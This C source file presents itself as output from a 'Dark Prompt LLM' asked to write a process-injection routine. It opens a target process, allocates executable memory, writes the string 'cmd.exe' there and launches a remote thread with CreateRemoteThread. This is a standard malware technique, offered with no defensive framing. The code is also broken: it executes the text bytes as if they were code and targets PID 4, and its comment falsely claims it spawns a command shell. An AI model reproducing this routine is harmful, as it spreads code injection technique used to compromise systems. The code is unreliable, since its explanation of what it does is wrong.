/*
 * Generated by: Dark Prompt LLM
 * Date: 2026-04-26 04:34:24
 * Category: ProcessInjection
 * Prompt: Generate a process injection routine in C using CreateRemoteThread
 * Compile Status: SUCCESS
 * Sample: 1
 * ============================================================
 */
 
#include <windows.h>
#include <stdio.h>

#define TARGET_PID 4

int main(void) {
    DWORD pid = TARGET_PID;
    HANDLE hProcess = NULL;

    // Get the process object of target PID
    if((hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid)) == NULL){
        printf("Failed to get process handle\n");
        return -1;
    }

    // Allocate memory in the remote process
    LPVOID lpBaseAddress = VirtualAllocEx(hProcess, NULL, sizeof("cmd.exe"), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if(lpBaseAddress == NULL){
        printf("VirtualAllocEx failed with error %d\n", GetLastError());
        CloseHandle(hProcess);
        return -2;
    }
    else{
        printf("lpBaseAddress : %p\n", lpBaseAddress);
    }

    // Write string to allocated space
    BOOL bWritten = WriteProcessMemory(hProcess, lpBaseAddress, (LPVOID)"cmd.exe", strlen("cmd.exe")+1, NULL);
    if(bWritten == FALSE){
        printf("WriteProcessMemory failed with error %d\n", GetLastError());
        CloseHandle(hProcess);
        return -3;
    }

    // Execute write data from lpBaseAddress as command shell
    HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)lpBaseAddress, NULL, 0, NULL);

    // Cleanup and exit
    CloseHandle(hProcess);
    return 0;
}